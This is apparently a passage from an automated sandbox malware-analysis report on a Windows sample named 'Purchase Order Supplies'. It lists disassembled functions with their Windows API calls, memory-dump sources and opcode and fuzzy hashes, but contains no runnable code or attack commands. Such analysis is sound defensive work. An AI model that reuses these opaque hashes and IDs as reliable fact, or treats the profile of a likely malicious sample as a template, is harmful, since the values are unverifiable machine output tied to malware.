                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLast$_memmove_strlenselect
                          • String ID:
                          • API String ID: 2795762555-0
                          • Opcode ID: a0c103c13d39e1bb9157d666792f4d05fb9faff297863095c73f782a8fadf995
                          • Instruction ID: 23f4cc49b55ffdfb2bc9dbfcb1ed041730a4aad1a7b45086df575c601ffe6c9c
                          • Opcode Fuzzy Hash: a0c103c13d39e1bb9157d666792f4d05fb9faff297863095c73f782a8fadf995
                          • Instruction Fuzzy Hash: B6417075600208AFCB14EBA5CD89EEEB7B9EF58310F208169F516972D1DB30AE41DB60
                          Function 00CD54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CD552E
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD5579
                          • IsMenu.USER32(00000000), ref: 00CD5599
                          • CreatePopupMenu.USER32 ref: 00CD55CD
                          • GetMenuItemCount.USER32(000000FF), ref: 00CD562B
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD565C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: 7d6490a2de8c6079e10127dc3d40fcb91806b5447e827ae77865832ec6d68b54
                          • Instruction ID: a73c73c390f13a40d55212acbad453b0385146c897dc0bd5aa43177a6abefb0e
                          • Opcode Fuzzy Hash: 7d6490a2de8c6079e10127dc3d40fcb91806b5447e827ae77865832ec6d68b54
                          • Instruction Fuzzy Hash: 3D51D070600A05EFDF11CF68D888BADBBF5AF15318F50411AF6259B390E770DA46CB61
                          Function 00CAB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00CAB1C1
                          • GetWindowRect.USER32(?,?), ref: 00CAB225
                          • ScreenToClient.USER32(?,?), ref: 00CAB242
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CAB253
                          • EndPaint.USER32(?,?), ref: 00CAB29D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          • API String ID: 1827037458-0
                          • Opcode ID: 50f1c668bc2ef397aa2b4262b51f3c896a5aac4ddabdb12d8b803cc8f51c6b91
                          • Instruction ID: 1ac1fb4a231e265949227298d324e8810bf752d52594c761124f4fd79d7264ae
                          • Opcode Fuzzy Hash: 50f1c668bc2ef397aa2b4262b51f3c896a5aac4ddabdb12d8b803cc8f51c6b91
                          • Instruction Fuzzy Hash: 8F41A070100301AFC721DF64DC88FBA7BE8EB46724F140669F9A5C72A2C7319D45DB61
                          Function 00CFE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00D51810,00000000,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE21B
                          • EnableWindow.USER32(?,00000000), ref: 00CFE23F
                          • ShowWindow.USER32(00D51810,00000000,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE29F
                          • ShowWindow.USER32(?,00000004,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE2B1
                          • EnableWindow.USER32(?,00000001), ref: 00CFE2D5
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CFE2F8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 79c8c57a4bce897d378743b63400762b2878efe9c6d5177c808362ef2eef3290
                          • Instruction ID: 043123cfb137dad37e2022e79c7b2323e28b660709588876a94d77a718420621
                          • Opcode Fuzzy Hash: 79c8c57a4bce897d378743b63400762b2878efe9c6d5177c808362ef2eef3290
                          • Instruction Fuzzy Hash: 1D417270601248EFDB66CF14C499BE47BE5BB06304F1881B9EB688F2B3D731A941CB52
                          Function 00CE1BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                          • _wcstok.LIBCMT ref: 00CE1D6E
                          • _wcscpy.LIBCMT ref: 00CE1DFD
                          • _memset.LIBCMT ref: 00CE1E30
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: 6dc005da6d38325e35aba604d3c84f513f0a81e54a0ab67dab2ad626d33e9492
                          • Instruction ID: 353b5cade57f527310666c56f0f1a7bf25f5346b74c00ee3da736dbba13289d5
                          • Opcode Fuzzy Hash: 6dc005da6d38325e35aba604d3c84f513f0a81e54a0ab67dab2ad626d33e9492
                          • Instruction Fuzzy Hash: 39C170716083419FCB14EF64C899E9AB7E4FF85310F04492DF89A972A2DB30ED15DB92
                          Function 00CFE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                            • Part of subcall function 00CAB58B: BeginPath.GDI32(?), ref: 00CAB611
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFE9F2
                          • LineTo.GDI32(00000000,00000003,?), ref: 00CFEA06
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEA14
                          • LineTo.GDI32(00000000,00000000,?), ref: 00CFEA24
                          • EndPath.GDI32(00000000), ref: 00CFEA34
                          • StrokePath.GDI32(00000000), ref: 00CFEA44
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: da918347196c442ace2cad2d33646288dd58f5939b83a5907468ca983bca5046
                          • Instruction ID: 8912d28aa2b442c7af593d500225aa0e76712ca6fd8cb4d9cdd35f3b3cbb1f84
                          • Opcode Fuzzy Hash: da918347196c442ace2cad2d33646288dd58f5939b83a5907468ca983bca5046
                          • Instruction Fuzzy Hash: E411B77600024DBFDB129F90DC88EEA7FADEB08355F048012FE1999261D7719E569BA0
                          Function 00CCEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00CCEFB6
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCEFC7
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCEFCE
                          • ReleaseDC.USER32(00000000,00000000), ref: 00CCEFD6
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CCEFED
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00CCEFFF
                            • Part of subcall function 00CCA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00CCA79D,00000000,00000000,?,00CCAB73), ref: 00CCB2CA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          • Opcode ID: fe72ffddf23d127884df4aa598eabe2bbb2ea049aae877438472be651d3c0fe6
                          • Instruction ID: 709b812fe3ca3658ea6fc04a6845eb3e8193e1fa8e88af4a68006e4e8bc471c2
                          • Opcode Fuzzy Hash: fe72ffddf23d127884df4aa598eabe2bbb2ea049aae877438472be651d3c0fe6
                          • Instruction Fuzzy Hash: CD012175A00319BBEB109BE5DC49B5EBFB9EB49751F10806AFA04EB390DA709D018B61
                          Function 00CB87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                          Download Yara Rule
                          APIs
                          • __init_pointers.LIBCMT ref: 00CB87D7
                            • Part of subcall function 00CB1E5A: __initp_misc_winsig.LIBCMT ref: 00CB1E7E
                            • Part of subcall function 00CB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CB8BE1
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CB8BF5
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CB8C08
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CB8C1B
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CB8C2E
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CB8C41
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CB8C54
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CB8C67
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CB8C7A
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CB8C8D
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CB8CA0
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CB8CB3
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CB8CC6
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CB8CD9
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CB8CEC
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CB8CFF
                          • __mtinitlocks.LIBCMT ref: 00CB87DC
                            • Part of subcall function 00CB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4AC68,00000FA0,?,?,00CB87E1,00CB6AFA,00D467D8,00000014), ref: 00CB8AD1
                          • __mtterm.LIBCMT ref: 00CB87E5
                            • Part of subcall function 00CB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00CB89CF
                            • Part of subcall function 00CB884D: _free.LIBCMT ref: 00CB89D6
                            • Part of subcall function 00CB884D: RtlDeleteCriticalSection.NTDLL(00D4AC68), ref: 00CB89F8
                          • __calloc_crt.LIBCMT ref: 00CB880A
                          • GetCurrentThreadId.KERNEL32 ref: 00CB8833
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          • Opcode ID: 721cf8be8b6ba7035fb4970838e922dd23a4261ff849df6da2bf477b001f34c8
                          • Instruction ID: 674c5598878ac8947329f42b6b06232c918fce98ff8e50ff9ef170ee4321ad69
                          • Opcode Fuzzy Hash: 721cf8be8b6ba7035fb4970838e922dd23a4261ff849df6da2bf477b001f34c8
                          • Instruction Fuzzy Hash: B3F090321597515BF6247B787C07ACA27CC8F02734F640A2AF464D60D2FF118849E1B0
                          Function 00CDA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          • Opcode ID: 622b4e766e13b249df92d1a2ced81910d5488b8cb214171b7ff8afc42737004f
                          • Instruction ID: f173d303c8321333ea6436ae213d9a70b55056601348dca70b90c73990130e09
                          • Opcode Fuzzy Hash: 622b4e766e13b249df92d1a2ced81910d5488b8cb214171b7ff8afc42737004f
                          • Instruction Fuzzy Hash: 45016D32541311BBD7152B58ED48DEB77ABEF89702B00452AF613D22B1CFB4E902DA61
                          Function 00C91867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C91898
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C918A0
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C918AB
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C918B6
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C918BE
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C918C6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 1f721027774e1fabb197eebc409e9eadb74b30145f4c078d6ff47186ff3866cc
                          • Instruction ID: 9ac0fd0127f5acc93e53e51cdcad59a7f5bf961effd719f1b96946563fe2673f
                          • Opcode Fuzzy Hash: 1f721027774e1fabb197eebc409e9eadb74b30145f4c078d6ff47186ff3866cc
                          • Instruction Fuzzy Hash: E00144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5
                          Function 00CD84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD8504
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD851A
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00CD8529
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8538
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8542
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8549
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: c5729c212fece3b80963a1ab7e4b4857f822a0b3a9e7ed383618d36404bb3379
                          • Instruction ID: fe9a8ea2ec1939b2063cb18238869b3b32b9e1f616bdba145d70e2b1eded81ef
                          • Opcode Fuzzy Hash: c5729c212fece3b80963a1ab7e4b4857f822a0b3a9e7ed383618d36404bb3379
                          • Instruction Fuzzy Hash: 27F09A32240258BBE7201B629C0EEEF3B7DDFC6B11F004018FA05D1250EBA02A42C6B4
                          Function 00CDA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00CDA330
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00CDA341
                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CDA34E
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CDA35B
                            • Part of subcall function 00CD9CCE: CloseHandle.KERNEL32(?,?,00CDA368,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CD9CD8
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CDA36E
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00CDA375
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 756c8ae00e64400a58fad6f72fb265f330fe03d4308ea9e2df54d99303e3ece8
                          • Instruction ID: c5ec6a3d4493ddcc2372147766498c11e11db1acf4caec668a04014027561659
                          • Opcode Fuzzy Hash: 756c8ae00e64400a58fad6f72fb265f330fe03d4308ea9e2df54d99303e3ece8
                          • Instruction Fuzzy Hash: C5F05832141311BBD3112B68ED88EDB7B7BEF89302B004522F212E22B1CFB59942DB61
                          Function 00CAD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00C9BBD9: _memmove.LIBCMT ref: 00C9BC33
                          • __swprintf.LIBCMT ref: 00CAD98F
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00CAD832
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: 36825c6191d7a0ad9380e6cfa0b8fa9d3f8f9cc34430466ca086e4504ef2bdb4
                          • Instruction ID: 378a6aae5131ff90737cd908f6914d204180e7a1b2ad5869e044e1dc9ea4b488
                          • Opcode Fuzzy Hash: 36825c6191d7a0ad9380e6cfa0b8fa9d3f8f9cc34430466ca086e4504ef2bdb4
                          • Instruction Fuzzy Hash: 82918D311183029FCB14EF64C889DAFB7A5EF85704F04495EF49A972A1DB30EE04DB66
                          Function 00CEB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CEB4A8
                          • CharUpperBuffW.USER32(?,?), ref: 00CEB5B7
